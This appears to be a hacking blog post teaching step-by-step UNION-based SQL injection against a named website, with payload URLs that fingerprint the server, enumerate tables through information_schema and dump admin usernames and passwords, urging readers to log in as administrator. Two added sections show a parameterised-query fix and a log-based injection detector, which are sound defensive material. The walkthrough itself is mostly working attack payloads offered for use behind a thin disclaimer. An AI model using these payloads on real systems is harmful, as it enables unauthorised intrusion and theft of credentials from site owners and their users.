Hello Hackers, you will be glad to hear that today I am going to teach you all how to hack a website in the easiest way (noob friendly).
THIS IS FOR EDUCATIONAL PURPOSE ONLY, I AM NOT RESPONSIBLE FOR ANY ILLEGAL ACTIVITIES DONE BY VISITORS, THIS IS FOR ETHICAL PURPOSE ONLY
We will start with what SQL injections actually are.
SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application, which allows an attacker to see the contents stored in the database. SQL stands for Structured Query Language. It's a high-level language close to human language.
Remember, this vulnerability only occurs when the user's input is not filtered or is improperly filtered.
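The root cause described above, shown next to its fix. This is an added example, not code from the original post or from any site it mentions: it uses Python with an in-memory SQLite database in place of a PHP page, and the table names, rows and the hostile sample value are constructed for illustration.

```python
import sqlite3

# Constructed hostile value for the "id" URL parameter (illustration only).
SAMPLE_HOSTILE_ID = "-1 UNION SELECT id, username FROM admin"

def make_db():
    # Constructed sample data, not taken from any real site.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO pages VALUES (1, 'About us');
        INSERT INTO admin VALUES (1, 'root', 'constructed-hash');
    """)
    return db

def page_title_vulnerable(db, raw_id):
    # BAD: the parameter is pasted into the SQL text, so the database
    # parses whatever the client sent as part of the statement.
    sql = "SELECT id, title FROM pages WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def page_title_safe(db, raw_id):
    # GOOD: validate the expected type first, then bind the value as a
    # parameter. The driver passes it as data; it is never parsed as SQL.
    try:
        page_id = int(raw_id)
    except ValueError:
        return []
    return db.execute(
        "SELECT id, title FROM pages WHERE id = ?", (page_id,)
    ).fetchall()

if __name__ == "__main__":
    db = make_db()
    print(page_title_vulnerable(db, "1"))                # normal request
    print(page_title_vulnerable(db, SAMPLE_HOSTILE_ID))  # leaks a row from admin
    print(page_title_safe(db, SAMPLE_HOSTILE_ID))        # rejected, no rows
```

The same fix in PHP is a prepared statement (PDO or mysqli) with the id bound as a parameter. Running the application under a database account that cannot read other schemas limits what a missed query can expose.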
example: http://www.cobranet.org/about.php?id=1
Step 1:
Choose a website which you wanna hack; in my case I selected the website as shown in the picture.
Step 2:
Now, check whether it is vulnerable or not by simply adding a single quote (') to the URL and hitting enter.
If no error or change is found in the page, that means this website is not vulnerable. Here, in my case I found changes. This means this website is vulnerable :D
Step 3:
Let's proceed further. Now we have to find how many columns are available in the database.
The way I will do this is by simply adding order by 1-- to the URL.
Increase the number from 1 upward until an error pops up.
In my case, it shows an error on order by 8--. This means there are 7 columns in the database! ;)
Step 4:
So to find the vulnerable column, we have to use the "UNION" and "SELECT" commands, and remember to put a hyphen or minus (-) before the 1 to avoid an error.
example: http://www.cobranet.org/about.php?id=-1
code: http://xxxx/Products.php?prodId=-4 union select 1,2,3,4,5,6,7--
As you can see, column 2 is vulnerable. In this case, we will simply replace 2 with version() or @@version to find out the version of the server.
In some cases, servers are not able to directly understand the command. For this purpose, you need to convert it: replace @@version with unhex(hex(@@version)).
So, the server is using SQL version 5.5.41. Also we know the OS is Ubuntu.
Now, we have to find out the user; we simply get it by replacing version() with user().
As you can see, the user is chaubara@localhost.
Now, we have to find out the database; we simply get it by replacing user() with database().
As you can see, the database is chaubara.
Step 5:
Now we have to extract the tables from the SQL database. The way we will do this is by replacing the vulnerable column with table_name and adding +from+information_schema.tables. The final URL will be
http://xxxx/Products.php?prodId=-4 union select 1,table_name,3,4,5,6,7 from information_schema.tables--
As you can see, the name of the table is CHARACTER_SETS. However, this is just one table. We can replace table_name with group_concat(table_name) to get all tables.
code: http://xxxx/Products.php?prodId=-4 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables.
Looking at the result, the end of the last table name is cut off. To correct this, you can modify the end of the URL to something like
http://xxxx/Products.php?prodId=-4 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--
Step 6:
That's it! Now we have to obtain the columns. The way I will do this is by simply replacing table_name with column_name and information_schema.tables with information_schema.columns. The final URL will be
http://xxxx/Products.php?prodId=-4 union select 1,group_concat(columns_name),3,4,5,6,7 from information_schema.columns where table_schema=database()--
Step 7:
We now have tables as well as columns. Now we will replace it with the column we want to obtain data from. Let's assume we want the data from the first table, "admin". We will use the following URL:
http://xxxx/Products.php?prodId=-4 union select 1,group_concat(columns_name),3,4,5,6,7 from information_schema.columns where table_name=0x61646d696e
Here, 0x is the prefix and admin in hex code is 61646d696e.
You can convert your text into hex code by using a converter.
Step 8:
Umm.. sounds interesting! Let's find out the username and password ;)
code: http://xxxx/Products.php?prodId=-4 union select 1,group_concat(id,0x3a,username,0x3a,password),3,4,5,6,7 from admin--
where 0x3a is the hex code of a colon (:); we use this to organise our result in a better way!
And this is how we successfully get the username and password without using any tool. ;)
Now find the admin panel and log into it as an administrator ;)
Happy Hacking! If you have any query, feel free to ask in the comments!
Thank-You.
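Every step above leaves a distinctive query string in the web server's access log. The following is an added example, not part of the original post: a small detector that flags those request shapes per client, assuming Apache/Nginx combined log format. The log lines and IP addresses are constructed samples.

```python
import re
from urllib.parse import unquote_plus

# One rule per request shape the walkthrough produces.
RULES = [
    ("order_by_probe", re.compile(r"\border\s+by\s+\d+\s*(--|#|$)", re.I)),
    ("union_select", re.compile(r"\bunion\s+(all\s+)?select\b", re.I)),
    ("schema_enum", re.compile(r"\binformation_schema\.(tables|columns)\b", re.I)),
    ("fingerprint", re.compile(r"@@version|\b(version|user|database)\s*\(\s*\)", re.I)),
    ("group_concat", re.compile(r"\bgroup_concat\s*\(", re.I)),
    ("hex_literal", re.compile(r"\b0x[0-9a-f]{2,}\b", re.I)),
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed access-log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /Products.php?prodId=4 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /Products.php?prodId=4+order+by+8-- HTTP/1.1" 500 310',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /Products.php?prodId=-4%20union%20select%201,'
    'group_concat(table_name),3,4,5,6,7%20from%20information_schema.tables-- HTTP/1.1" 200 5300',
    '203.0.113.9 - - [01/Jan/2024:10:00:14 +0000] "GET /Products.php?prodId=-4+union+select+1,'
    'group_concat(id,0x3a,username),3,4,5,6,7+from+admin-- HTTP/1.1" 200 5200',
]

def classify(line):
    """Return client IP, status and matched rule names for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    # Decode %20 and + so the rules see the SQL text the server saw.
    query = unquote_plus(target.partition("?")[2])
    hits = [name for name, rx in RULES if rx.search(query)]
    return {"ip": ip, "status": int(status), "hits": hits}

def suspicious_clients(lines):
    """Map each client IP to the set of rules its requests matched."""
    out = {}
    for line in lines:
        rec = classify(line)
        if rec and rec["hits"]:
            out.setdefault(rec["ip"], set()).update(rec["hits"])
    return out

if __name__ == "__main__":
    for ip, hits in suspicious_clients(SAMPLE_LOG).items():
        print(ip, sorted(hits))
```

A single hit on a rule such as hex_literal can be a legitimate parameter; a client matching several rules within a short window is the stronger signal. Only GET query strings appear in access logs, so POST bodies need WAF or application-level logging.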